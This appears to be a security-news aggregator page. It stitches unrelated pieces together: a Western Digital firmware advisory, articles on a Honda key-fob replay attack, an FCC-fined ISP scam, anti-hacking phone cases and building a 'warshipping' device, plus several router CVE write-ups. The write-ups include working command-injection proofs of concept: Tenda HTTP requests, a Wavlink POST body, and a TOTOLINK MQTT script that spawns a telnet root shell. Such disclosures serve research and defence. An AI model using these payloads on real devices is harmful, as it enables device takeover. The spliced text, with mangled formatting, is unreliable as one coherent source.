Implemented protections on AWS credentials that were not properly protected.

**WDC Tracking Number:** WDC-22009  
**Published:** July 11, 2022

**Last Updated:** July 11, 2022

**Description**

My Cloud Home Firmware 8.7.0-107 is a major release containing updates to help improve the security of your My Cloud Home devices. Numerous changes were made to the operating system to comprehensively improve its security and to upgrade the user experience to support our latest technologies.

The base operating system has been upgraded from an Android based operating system to the Linux operating system to align with security and stability updates from Debian 10 “Buster”.

Additionally, the Linux kernel has been updated to 4.9.266.

Your My Cloud Home device will be automatically updated to reflect the latest firmware version.    

**Product Impact**

**Minimum Fix Version**

**Last Updated**

My Cloud Home

8.7.0-107

July 8, 2022

My Cloud Home Duo

8.7.0-107

July 8, 2022

For more information on the latest security updates, see the release notes.

**Advisory Summary**

A vulnerability in the Linux kernel’s cgroup\_release\_agent\_write was addressed that could lead to escalation of privileges and bypass namespace isolation unexpectedly.  

Addressed an issue in OpenSSL that would make it possible to trigger an infinite loop by crafting a certificate that has invalid elliptic curve parameters. Since certificate parsing takes place before the certificate signature verification process, this could lead to a denial-of-service attack.

**CVE Number:** CVE-2022-0778  

Addressed a memory copy vulnerability in the Linux Wi-Fi driver.  

Addressed a command injection attack that could allow a malicious attacker on the same LAN to carry out a DNS spoofing attack via an unsecured HTTP call. This was done by removing the affected code from the product.

**CVE Number:** CVE-2022-22991, CVE-2022-22994

Reported By: Martin Rakhmanov (@mrakhmanov) working with Trend Micro’s Zero Day Initiative  

A vulnerability was discovered within the parsing of extended attributes (EA) metadata when opening a file in smbd. This vulnerability can be exploited by unauthenticated users if they are allowed write access to file extended attributes. This vulnerability was addressed by removing the "fruit" VFS module from the list of configured VFS objects and by changing EA support configurations.

**CVE Number:** CVE-2021-44142

Reported By: Nguyen Hoang Thach (@hi\_im\_d4rkn3ss) and Billy Jheng Bing-Jhong (@st424204) working with Trend Micro’s Zero Day Initiative  

Addressed multiple FFmpeg vulnerabilities by updating the version to 7:4.1.8-0+deb10u1.

**CVE Number:** CVE-2020-20445, CVE-2020-20446, CVE-2020-20453, CVE-2020-21041, CVE-2020-22015, CVE-2020-22016, CVE-2020-22017, CVE-2020-22019, CVE-2020-22020, CVE-2020-22021, CVE-2020-22022, CVE-2020-22023, CVE-2020-22025, CVE-2020-22026, CVE-2020-22027, CVE-2020-22028, CVE-2020-22029, CVE-2020-22030, CVE-2020-22031, CVE-2020-22032, CVE-2020-22033, CVE-2020-22034, CVE-2020-22035, CVE-2020-22036, CVE-2020-22037, CVE-2020-22049, CVE-2020-22054, CVE-2020-35965, CVE-2021-38114, CVE-2021-38171, CVE-2021-38291  

Addressed multiple FFmpeg vulnerabilities by updating the version to 7:4.1.9-0+deb10u1.  

Implemented firmware signing to prevent malicious modifications to the firmware and verify the firmware’s authenticity and integrity.  

Transitioned to Go’s crypto/tls library for secure communications.  

Enabled several kernel hardening options to make exploits of kernel and userland security bugs more difficult to develop.  

Addressed a remote code execution vulnerability by resolving a command injection vulnerability and closing an AWS S3 bucket that potentially allowed an attacker to execute unsigned code on My Cloud Home devices. Implemented protections on AWS credentials that were not properly protected..

**CVE Number:** CVE-2022-22997, CVE-2022-22998

Western Digital would like to thank Viettel Cyber Security for reporting this issue.  

Addressed multiple libtiff null pointer dereference vulnerabilities by updating the version to 4.4.0.

**CVE Number:** CVE-2022-0562, CVE-2022-0561, CVE-2022-0865  

Addressed an improper input validation and out-of-bounds write vulnerability in TensorFlow which is an open-source platform for machine learning. An attacker could pass negative values to cause a segmentation fault-based denial-of-service attack. Certain components also did not validate input arguments which could also trigger a denial-of-service attack.

**CVE Number:** CVE-2022-29191, CVE-2022-29213, CVE-2022-29208

CVE-2022-22998: WDC-22009 My Cloud Home Firmware Version 8.7.0-107 | Western Digital

Improper access control vulnerability in updateLastConnectedClientInfo function of SemWifiApClient prior to SMR Jul-2022 Release 1 allows attacker to access wifi ap client mac address that connected.

CVE-2022-30750

By Deeba Ahmed
A cybersecurity researcher using the alias Kevin2600 has revealed how hackers can exploit a vulnerability to unlock Honda vehicles. According…
This is a post from HackRead.com Read the original post: Researcher Reveals How Hackers Can Remotely Unlock/Start Honda Cars

****A cybersecurity researcher using the alias Kevin2600 has revealed how hackers can exploit a vulnerability to unlock Honda vehicles.****

According to Kevin2600, associated with cybersecurity firm Star-V Lab, the vulnerability allows attackers to steal the code and unlock or even start Honda vehicles using basic hardware.

He dubbed the bug Rolling-PWN and published videos demonstrating the attack and a detailed technical report on the newly discovered vulnerability. The National Vulnerability Database called it a “Counter resynchronization attack” and assigned it CVE-2021-46145.

**Details of the Vulnerability**

Regarding it as a “serious vulnerability,” Kevin 2600 revealed identifying the bug in a “vulnerable version of the rolling codes mechanism,” which is used in most Honda cars. The researcher wrote that the vulnerability lets the attacker open the car door permanently and start the engine from a considerable distance.

Theoretically, it means every time the car’s owner uses the keyfob, it will dispatch a new code to open the car. The mechanism is devised to make it impossible to steal and reuse the code. However, the vulnerability lets the attacker roll back the codes and reuse an old code to open the car.  

**Attack Overview**

Kevin2600 explained in a technical report that the attack works when the attacker uses a software-defined radio, for example, HackRF, to capture the code the car’s owner uses for unlocking the vehicle.

The attacker would then replay it to reset the internal pseudo-random number generator or PRNG counter and unlock the car from as far as 98 feet or 30 meters distance. For this attack, hackers only need valid old keys, which they can retrieve by attaching a logging device to the vehicle to receive valid codes and replay them.

In his videos, the researcher demonstrated the efficacy of this attack by successfully unlocking various models of Honda vehicles using a device connected to a laptop. Of all the models Kevin2600 and his colleagues tested at a Honda dealership, ten used the rolling code mechanism and were found vulnerable to the attack.

Hence, researchers concluded that all Honda vehicle models manufactured between 2012 and 2022 are vulnerable. The list of impacted models provided by Kevin2600 includes the following:

*   Honda Fit 2022
*   Honda Civic 2012
*   Honda X-RV 2018
*   Honda VE-1 2022
*   Honda Civic 2022
*   Honda C-RV 2020
*   Honda Inspire 2021
*   Honda Accord 2020
*   Honda Breeze 2022
*   Honda Odyssey 2020

**Honda’s Response**

A Honda spokesperson stated that the vulnerability discovered by Kevin2600 is not new, and the company already knows about it. They want to treat it as “old news” and “move on to something current rather than creating a new round of people thinking this is a ‘new’ thing.”

However, the researcher claims the Honda spokesperson referred to a study conducted earlier this year that focused only on fixed codes and not on rolling codes. Kevin2600 explained that this is a concerning issue because the attack is hard to detect as there’s no way to identify if someone has exploited the flaw to start or unlock the car.

A recall, according to Kevin2600, is imminent to fix the issue, so owners may take their cars to the local dealership to update Keyfob firmware with a patch.

**More Vehicle Manufacturer Security News**

*   Personal data of over 50,000 Honda Connect App leaked
*   Honda hit by WannaCry ransomware attack; shuts down plant
*   Tesla cars can be remotely hacked using a drone, WIFI dongles
*   3rd-party flaws allowed a teen hacker to track location of Tesla cars
*   Multiple Internet-Connected BMW vehicles are vulnerable to getting hacked

Researcher Reveals How Hackers Can Remotely Unlock/Start Honda Cars

The US Federal Communications Commission says a man posing as a fake broadband service promised victims discounts on internet services and devices.

Traxler's scam lasted from May to August 2021, during which he "repeatedly engaged in conduct that violated the federal wire fraud statute and the Commission's rules," the FCC said. The proposed $220,210 forfeiture penalty is "the statutory maximum we can impose, and reflects the scope, duration, seriousness, and egregiousness of Cleo's apparent violations," according to the commission.

When Cleo applied to be in the EBB program, the FCC initially told the entity that its application would be "denied as it lacks sufficient information for approval." But Cleo subsequently gained FCC approval by offering documents including copies of two invoices "with customer-identifying information removed, which Cleo claimed was 'due to CPNI and privacy.'" Cleo also claimed to the FCC that it "had been providing high-speed wireless Internet" to 500 customers.

Dozens of Nearly Identical Complaints

The FCC said it reviewed 41 complaints about Cleo, all of which "focused on the same types of allegations. According to the complaints, consumers searched the list of participating EBB Program providers through individual states' Universal Service or EBB Program websites, the FCC website, or USAC's \[Universal Service Administrative Company\] website and followed links to Cleo's website. The complaints alleged that Cleo accepted payment for EBB Program discounted broadband services or connected devices from these consumers electronically, failed to send the ordered product or provide the requested services, and then failed to provide refunds."

The FCC interviewed eight of the consumers who filed complaints, who live in Alabama, Arizona, Colorado, Illinois, Massachusetts, New York, Washington state, and Wisconsin.

An Illinois woman ordered a laptop from Cleo for $50 using the Venmo payment service. The woman got no response when she contacted Cleo to report that she never received the laptop, the FCC said. She then "attempted to reach out to Cleo via social media (Facebook) and by telephone, but Cleo did not respond and blocked her both on Facebook and telephone," the FCC said.

A New York woman "ordered an EBB Program-discounted tablet, laptop, 'Wi-Fi box,' and hotspot service from Cleo's website on July 13, 2021, and arranged payment of $108.94 on the website through PayPal," the FCC said. This consumer "told Bureau staff that she e-mailed Cleo when she did not receive the devices she ordered and that Cleo staff were 'rude to her and told her they didn't have to provide service to her.' She said someone at Cleo told her to 'read the fine print.' She exchanged a few e-mails with Cleo until it ultimately stopped responding."

Other complainants similarly said that Cleo stopped responding to messages seeking information on the devices they never received. Some of the consumers were able to cancel payments made via credit card or PayPal.

"The eight consumers interviewed by the Bureau and other consumers who filed complaints with the FCC's Consumer Complaint Center all stated that Cleo did not deliver the EBB Program-supported services or devices they ordered, and the company refused to issue refunds. Some consumers stated in their complaints that Cleo claimed it would sue them when they asked for a refund," the FCC said.

Shady Terms of Service Forbade Refunds

The terms of service that Cleo cited when denying refunds said the company "does NOT nor will ever imply or agree upon a refund, credits nor any other refunds of service and monies to be returned to you."

"Cleo Communications operates a PREPAID Service. All services are sold as in \[sic\] and without warranty. Under NO circumstances does Cleo Communications represent any warranty nor provide a refund of any kind for services that are offered," the terms state, according to the FCC. The Cleo terms additionally said that "charge backs to us via any customer bank is breach of contract at any time and is subject to further legal action up to but not limited to small claims court actions for breach of contract in the amount of what is disputed, any and all legal fees, court fees, attorney fees, filing fees, interest at 9.9%, and a contract breach fee in the amount of $300.00."

Rude Responses: “You Will Be Taken to Court”

The FCC document detailed incidents in which Cleo responded to customers seeking refunds by threatening to sue or seek charges for harassment:

_As examples, on August 2, 2021, when a customer e-mailed requesting a refund, Cleo responded, "\[y\]our wish to hide behind PayPal instead of contacting us. We will not be issuing you a refund. We will not be allowing you to use your benefits as we have claimed them. And you will be taken to Court. Cleo Care."_

_On August 10, 2021, when another customer requested a refund, Cleo responded, "Refund denied. Please see the terms of service that outline your rights and our obligations and rights that will be imposed. Also your EBB has been claimed. You will not use our credit anywhere else and you will be issued an invoice and to collections. Cleo Collections." Cleo continued in a later e-mail with that customer by saying, "\[n\]ext time read before you order. As we will now no longer communicate. Any further e-mails will result in harassment charges in Ohio. Cleo Legal."_

_On August 12, 2021, Cleo stated to another customer, "\[w\]e are not ignoring you, nor are we charging you. You have requested a refund and refunds are not given and was informed of this and someone would decide of \[sic\] one would be issued or not. Please see- kyty.xyz/terms.html. Is what was sent to the FCC. With documents that you are and have not been ignored that your claims state \[sic\]. Cleo Legal Affairs._

_This story originally appeared on_ _Ars Technica__._

An ISP Scam Targeted Low-Income People Seeking Government Aid

Wavlink WL-WN575A3 RPT75A3.V4300.201217 was discovered to contain a command injection vulnerability via the function obtw. This vulnerability allows attackers to execute arbitrary commands via a crafted POST request.

**Information**

**Vendor of the products:**    WAVLINK

**Vendor's website:**    https://www.wavlink.com/en\_us

**Reported by:**    WangJincheng(wjcwinmt@outlook.com) & ShaLetian(ltsha@njupt.edu.cn)

**Affected products:** Wavlink WL-WN575A3

**Affected firmware version:** RPT75A3.V4300.201217

**Firmware download address:** https://www.wavlink.com/en\_us/firmware/details/fac744bd61.html

**Overview**

Wavlink WL-WN575A3 RPT75A3.V4300.201217 has several command injection vulnerabilities detected at function obtw. Attackers can send POST request messages to /cgi-bin/wireless.cgi and inject evil commands into parameter CCK_1M or CCK_5M or OFDM_6M or OFDM_12M or HT20_MCS_0 or HT20_MCS_1_2 or HT40_MCS_0 or HT40_MCS_32 or HT40_MCS_1_2 to execute arbitrary commands.

**Show the product**

Wavlink WL-WN575A3 is a AC1200 Dual-band Wi-Fi Range Extender. The test version here is RPT75A3.V4300.201217.

**Vulnerability details**

The vulnerability is detected at /etc_ro/lighttpd/www/cgi-bin/wireless.cgi.

At first, from the _start entry enters, and then the ftext function is executed.

In the function ftext, we find that when bypassing the check of wlan_conf and the content of page field is obtw, we can execute the obtw function.

In the function obtw, the program uses function web_get to obtain the content of parameter obtw_enable , CCK_1M , CCK_5M , OFDM_6M , OFDM_12M , HT20_MCS_0 , HT20_MCS_1_2 , HT40_MCS_0 , HT40_MCS_32 and HT40_MCS_1_2 which are sent by POST request. Then, when obtw_enable != 0, the content of other parameters are formatted into a string passed as an argument to the function do_system which can execute system commands.

Above all, attackers can send POST request messages to /cgi-bin/wireless.cgi and let wlan_conf=2860 & page=obtw and inject evil commands into parameter CCK_1M or CCK_5M or OFDM_6M or OFDM_12M or HT20_MCS_0 or HT20_MCS_1_2 or HT40_MCS_0 or HT40_MCS_32 or HT40_MCS_1_2 to execute arbitrary commands.

**POC**

Send the following to the URL http://wifi.wavlink.com/cgi-bin/wireless.cgi by POST request.

    wlan_conf=2860
    &page=obtw
    &obtw_enable=1
    &CCK_1M=;echo 1 >> /etc_ro/lighttpd/www/data.html;
    &CCK_5M=;echo 2 >> /etc_ro/lighttpd/www/data.html;
    &OFDM_6M=;echo 3 >> /etc_ro/lighttpd/www/data.html;
    &OFDM_12M=;echo 4 >> /etc_ro/lighttpd/www/data.html;
    &HT20_MCS_0=;echo 5 >> /etc_ro/lighttpd/www/data.html;
    &HT20_MCS_1_2=;echo 6 >> /etc_ro/lighttpd/www/data.html;
    &HT40_MCS_0=;echo 7 >> /etc_ro/lighttpd/www/data.html;
    &HT40_MCS_32=;echo 8 >> /etc_ro/lighttpd/www/data.html;
    &HT40_MCS_1_2=;echo 9 >> /etc_ro/lighttpd/www/data.html;
    

**Review Vulnerabilities**

At first, we confirm that the page /data.html does not exist.

Then, we use HackBar to send the POC above. **We inject commands that output 1 to 9 in turn into each parameter.**

Finally, we detect that the page /data.html has been created and the number 1 to 9 are displayed on the page.

So far, we have verified that **the all above nine parameters can be vulnerability points injected by arbitrary commands**.

CVE-2022-34592: CVE/README.md at main · winmt/CVE

TOTOLINK EX300_V2 V4.0.3c.7484 was discovered to contain a command injection vulnerability via the langType parameter in the setLanguageCfg function. This vulnerability is exploitable via a crafted MQTT data packet.

**Information**

**Vendor of the products:**    TOTOLINK

**Vendor's website:**    http://www.totolink.cn

**Reported by:**    WangJincheng(wjcwinmt@outlook.com) & ShaLetian(ltsha@njupt.edu.cn)

**Affected products:**    TOTOLINK EX300\_V2

**Affected firmware version:** V4.0.3c.7484

**Firmware download address:** http://www.totolink.cn/data/upload/20210720/b351052836a4fc7e1575dc513afc02b1.zip

**Overview**

TOTOLINK EX300_V2 V4.0.3c.7484 has a command injection vulnerability detected at function setLanguageCfg. Attackers can send a MQTT data packet and inject evil commands into parameter langType to execute arbitrary commands.

**Show the product**

TOTOLINK EX300_V2 is a Wi-Fi repeater made in China.

**Vulnerability details**

The vulnerability is detected at /bin/cste_modules/global.so.

In the function setLanguageCfg, the content obtained by program through parameter langType given by MQTT data packet is passed to variable Var. Then, the variable Var is formatted into v9 through the function sprintf without any check. Finally, v9 is passed as an argument to the function CsteSystem which can execute system commands.

Above all, attackers can send a MQTT data packet and inject evil commands into parameter langType to execute arbitrary commands.

**POC**

import paho.mqtt.client as mqtt

client \= mqtt.Client()
client.connect("192.168.0.254", 1883, 60)
client.publish("totolink/router/setLanguageCfg", '{"langType": "$(telnetd -l /bin/sh)"}')

**Get shell**

At first, we run the above script to exploit the vulnerability.

Then, we scan ports and dectect that the port 23 which represents Telnet service has been opened.

Finally, we telnet into the Wi-Fi repeater through port 23 and control it successfully.

CVE-2022-32449: CVE/README.md at main · winmt/CVE

By Deeba Ahmed
Israeli Mobile Cybersecurity Startup Cirotta has launched smartphone cases that the company claims to provide complete protection while…
This is a post from HackRead.com Read the original post: Mobile Cybersecurity Firm Cirotta Launches Anti-Hacking Phone Cases

****Israeli Mobile Cybersecurity** **Startup Cirotta has launched smartphone cases that the company claims to provide complete protection while allowing full operation of devices.****

Tel Aviv, Israel-based startup Cirotta has introduced a ground-breaking method to prevent mobile phone hacking and data privacy breaches. The company explained in a press release that it has successfully converted smartphone cases into full-fledged electronic security devices.

**A Novel Idea**

Undoubtedly, turning phone cases into electronic security gadgets is a unique idea to create a security barrier between threat actors and smartphone data. According to Cirotta, these phone cases offer foolproof security to the phone without impacting the device’s normal operations.

**Target Consumers**

The case price starts at $200, which is quite expensive for a phone case. However, it is worth investing in protecting your data. The cases’ target audiences currently include security, government, and military institutions/officials, high-profile executives, and VIPs.

For your information, Cirotta specializes in creating advanced anti-surveillance technologies for smartphones.

**Anti-Hacking Phone Case Detailed Overview**

According to Cirotta, these anti-hacking phone cases are backed up by six patents. These are available in numerous configurations to meet the diverse needs of smartphone users.

Moreover, these cases are non-device or network-specific and function independently. Another great feature is that the cases are well-designed and aesthetically pleasing. Regarding their capabilities, Cirotta explained that the case blocks camera lenses to prevent threat actors from accessing cameras and spying on the user.

Furthermore, these prevent undesired conversation tracking/recording, thwart operating system hacking or data sweeping when the phone is turned on, and use highly advanced security algorithms to evade the phone’s active noise filtering mechanism.

The cases can also prevent hackers from abusing microphones remotely and block location tracking by overriding the GPS data. That’s not all; the anti-hacking cases can nullify monitoring of Wi-Fi and Bluetooth connections and offset Near-field communication (NFC).

**Two Models Available in Anti-Hacking Cases**

The cases are available in two models- Athena and Universal. Athena is compatible with a broad range of high-end smartphone models, including the iPhone 12 Pro, iPhone 13 Pro, Samsung Galaxy S22, and upcoming models in these series.

Currently, Athena Silver is available that can block the device’s camera and mic. Athena Gold will be launched soon with the capability of securing the device’s Wi-Fi, GPS, and Bluetooth connectivity, among other features.

Conversely, the Universal model is compatible with almost all smartphone models. You can choose between Universal Gold, Silver, and Bronze model. Bronze can only block the phone’s camera, Silver can block the camera and mic, and Gold can block all transmissible data points such as camera, mic, GPS, Wi-Fi, and Bluetooth. This model will be available from August 2022.

**More Anti-Surveillance & Anti-Hacking Tools**

*   Anti-surveillance mask enables you to pass as someone else
*   Meet IRpair & Phantom; powerful anti-facial recognition glasses
*   These Anti-Surveillance Tools Will Protect Activists and Their Privacy
*   New anti-facial recognition glasses protect users’ privacy from CCTV
*   SnoopSnitch — An App That Detects Govt’s Stingray Mobile Trackers

Mobile Cybersecurity Firm Cirotta Launches Anti-Hacking Phone Cases

Here's how I did it and how you can protect your company against such physical/digital hybrid attacks.

Most companies have strategies in place to educate employees about network security. But there has been a lot less awareness and education on how to reduce "phygital" risks — that is, physical devices that launch digital attacks against a company's computer networks.

Another name for these phygital attacks is "warshipping." Essentially, a malicious hacker creates an Internet-enabled device — for example, a miniature computer — and sends it through physical mail in an attempt to compromise a company's computer network. What's more, because so many employees have yet to return to their physical offices post-lockdown, these devices can easily sit for months unattended in unopened mail on desks and in mailrooms, gathering data and exploiting vulnerabilities in a company's network.

It's frighteningly easy and inexpensive to make your own DIY version of a warshipping device. With just three hours, a couple of hundred dollars, and a few YouTube videos, nearly anyone can do it. To show you exactly how easy it is, I'm going to talk about how I built a warshipping device and then discuss what you can do to protect your company against these attacks.

**Building a Warshipping Device**

Prepare yourselves for a bit of a technical jump into hardware and software. We don't have the space here to go into every aspect of building a warshipping device, but the following should give you a harrowing sense of exactly how easy and inexpensive the process can be.

**Building hardware.** The foundation of any warshipping device is as simple as a hobbyist circuit board not much bigger than a credit card, which can operate like a miniature computer. One example is a Raspberry Pi, which is easily found online and arrives with the required software, or at least software that can also be easily found online.

Next you need a Wi-Fi dongle of some kind so your warshipping device can connect to the Internet wirelessly. A USB Wi-Fi adapter and a memory card with at least 32 GBs of storage, along with a SIM card to enable a cellular connection and optional GPS device, will complete the hardware requirements.

**Software prerequisites.** Raspberry Pis have their own Ubuntu-based operating system (OS) called Raspberry Pi OS.

Next you'll need to establish remote access. You need to find your device's IP address so you can connect to it through your computer or another device. To do that, you can run a scan on your local network or use a smartphone app. Next enter the default password for a Raspberry Pi, which is "raspberry." You now have a functional warshipping device.

**Ready for warshipping.** At last you can install your software for warshipping. Your actual warshipping software comes in two parts: your optional GPS software if you want to keep track of your device location and Kismet or a similar network-detecting software.

Kismet acts as a packet sniffer, which finds and captures packets of data from a network to store or forward that information. So Kismet can potentially be used to grab data from your network.

Your device is now ready to cause a world of pain for some poor IT team. All you have to do is send it in the mail, and when it arrives you can access sensitive data or find a vulnerable access point for an attack via the cellular connection. Then you could join the realm of malicious hackers who are costing companies worldwide $2.9 million every minute due to cybercrime.

**Key Takeaways**

So what are some useful takeaways from all of this?

First, you need to realize that this threat isn't going away. These attacks are simply too easy to launch and too hard to address. After all, who has the time to sort through all of that incoming mail as soon as it arrives?

Second, you need to develop phygital security measures as part of your overall cybersecurity efforts. Packages can sit in mailrooms for weeks — or these days, months — before someone processes them. Any of those packages could contain a warshipping device that can use their idle time gathering data from your network. Because warshipping devices can be small enough to fit between two pieces of cardboard, even an opened empty box you're saving in the mailroom to be reused at a later date could be a threat. 

To address the issue, you can start by immediately processing packages that are incorrectly addressed, since these will get returned to the sender. But you should go beyond that to process all unopened mail as quickly as possible and never retain used packaging materials in the mailroom. You can also look into the latest mail-scanning technology, which can detect these devices while avoiding the harmful effects of X-rays.

Third, network discovery software can help you pick up on unusual traffic and detect any new devices the minute they connect to your network. That means you can potentially detect a warshipping device before any damage is done. In addition, the wave of layoffs in the recent Great Resignation, insider threats from individuals who are or formerly were authorized users in your network are just as common and may be harder to detect, since these people may have access to approved credentials and devices.

Fourth, educate your employees. They likely have no idea that packages they left on their desks for a few days while they were working remotely could have a warshipping device inside, so do them and yourselves a favor by alerting them to the possible threat.

If there's one thing you've learned from this article, it should be that the phygital world is a dangerous place. But just knowing about the danger is half the battle. So now you know.

I Built a Cheap 'Warshipping' Device in Just 3 Hours — and So Can You

Tenda AX1803 v1.0.0.1_2890 was discovered to contain a command injection vulnerability via the function setipv6status.

#_**\* Tenda ax1803 has a command injection vulnerability\***_

##\* \* \* \\ \* overview\*\*\*\*

• \*\*\*\*\* type \\ \*\*\*\*: command injection vulnerability

• \* \* \* \\ \* supplier \\ \* \* \* \*: Tengda（ https://tenda.com.cn ）

• \*\*\*\*\* product \*\*\*\*: WiFi router ax1803

• _**\*Firmware download address：\***_ https://www.tenda.com.cn/download/detail-3225.html

• \*\*\*\*Firmware download address：\*\*\*\*https://down.tenda.com.cn/uploadfile/AX1803/US\_AX1803v2.1br\_v1.0.0.1\_2890\_CN\_ZGYD01.zip

Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network! Command Execution Vulnerability in setipv6status

##\* \* \* \\ \* description\*\*\*\*

###_**\* I. product information:\***_

Overview of the latest version of Tenda ax1803 router simulation:

\### _**\*2. Vulnerability details\***_

Tenda ax1803 is found to have a command injection vulnerability in the setipv6status function

When we set connect type = ' PPPoE ', we will get a command injection vulnerability after logging in.

\## _**\*3. Recurring vulnerabilities and POCS\***_

To reproduce the vulnerability, the following steps can be followed:

Start firmware through QEMU system or other methods (real machine)

Attack with the following POC attacks

Note to replace the password field in the cookie

    POST /goform/setIPv6Status HTTP/1.1
    Host: 192.168.2.1
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://192.168.2.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    IPv6En=1&conType=PPPoE&ISPusername=addasdas&ISPpassword=$(ls > /tmp/xxx)&prefixDelegate=0&wanAddr=%2F&gateWay=&lanType=undefined&wanPreDNS=&wanAltDNS=&lanPrefix=undefined%2F64

CVE-2022-34595: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

Tenda AX1806 v1.0.0.1 was discovered to contain a command injection vulnerability via the function WanParameterSetting.

**\*\*\* Command Injection Vulnerability in Tenda AX1806 \*\*****_**\*Overview\***_**

*   _**\*Type\***_: Command Injection Vulnerability
    
*   _**\*Supplier\***_: Tenda ( https://tenda.com.cn )
    
*   \*\*\*Product\*\*: WiFi router AX1806
    
*   Firmware download address: \*\*\*\* https://www.tenda.com.cn/download/detail-3306.html
    
*   Firmware download address: \*\*\*\* https://down.tenda.com.cn/uploadfile/AX1806/US\_AX1806V21brv1001cn2988ZGDX01.zip
    

Tenda AX1806 uses a new generation of WIFI6 (802.11ax) technology, and combines higher number of subcarriers and 1024QAM modulation technology. Compared with wifi-5 routers, dual-band wireless internet access rate is greatly improved. WanParameterSetting has a Command Execution Vulnerability

**_**\*Description\***_****\*_**1, Product Information:\***_**

Overview of the latest version of Tenda AX1806 router simulation:

\### \*_**2\. Vulnerability Details\***_

Tenda AX1806 was found to have a command injection vulnerability in the WanParameterSetting function

The non-zero is true, and when we change the adslPwd parameter, we get a command injection vulnerability after setting it.

**_**\*3. Recurring loopholes and POC\***_**

To reproduce the vulnerability, the following steps can be followed:

Start firmware (real machine) via qemu-system or other means

Attack using the following POC attacks

Note the replacement of password fields in cookies

    POST /goform/WanParameterSetting?0.8762489734485668 HTTP/1.1
    Host: i92.168.68.150
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://i92.168.68.150
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    wanType=2&adslUser=aaaa&adslPwd=$(ls > /tmp/xxx)&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=l&dnsAuto=1&staticIp=&mask=&gateway=&dnsl=&dns2=&module=wanl&downSpeedLimit=

Tag

#wifi